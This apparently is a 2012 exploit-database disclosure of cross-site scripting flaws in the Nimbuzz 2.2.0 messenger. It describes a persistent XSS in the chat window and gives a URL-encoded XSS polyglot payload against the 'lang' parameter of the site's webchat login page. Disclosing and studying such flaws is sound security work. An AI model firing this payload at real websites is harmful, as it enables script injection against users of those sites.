Nimbuzz 2.2.0 Cross Site Scripting

`*# Exploit Title: Nimbuzz 2.2.0 Cross Site Scripting  
# Date: 09.04.2012  
# Author: Sony  
# Software Link:  
http://www.nimbuzz.com/en/get/voip-and-chat-on-pc/pc-client-downloaded  
# Software Version: 2.2.0  
# Web Browser : Mozilla Firefox  
# Blog : http://st2tea.blogspot.com  
# PoC:http://st2tea.blogspot.com/2012/04/nimbuzz-220-cross-site-scripting.html  
..................................................................*  
  
* *  
  
*Well, we have xss in the messenger, interesting place for xss)  
  
http://1.bp.blogspot.com/-oZCtF5p8yPg/T4LmoWSfz-I/AAAAAAAAA8A/NwcttC0s4c0/s1600/ni.png  
  
**We have xss in the Chat Window-->View in Browser. (persistent code)  
  
Some pics and video PoC:  
  
http://4.bp.blogspot.com/-lDyKyFhqWiU/T4LqFhg9LQI/AAAAAAAAA8M/Mc7FcodbdPM/s1600/nim.JPG  
  
http://www.youtube.com/watch?v=t8mC6Oceq0Y  
  
**And where is forget password: *  
http://www.nimbuzz.com/webchat_login?lang=en&step=2&login=error  
http://www.nimbuzz.com/webchat_login?lang=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E  
  
http://2.bp.blogspot.com/-LXxT4HBs80A/T4Lu1IdlbaI/AAAAAAAAA8Y/YyCzOcyh76I/s1600/nimb2.JPG  
`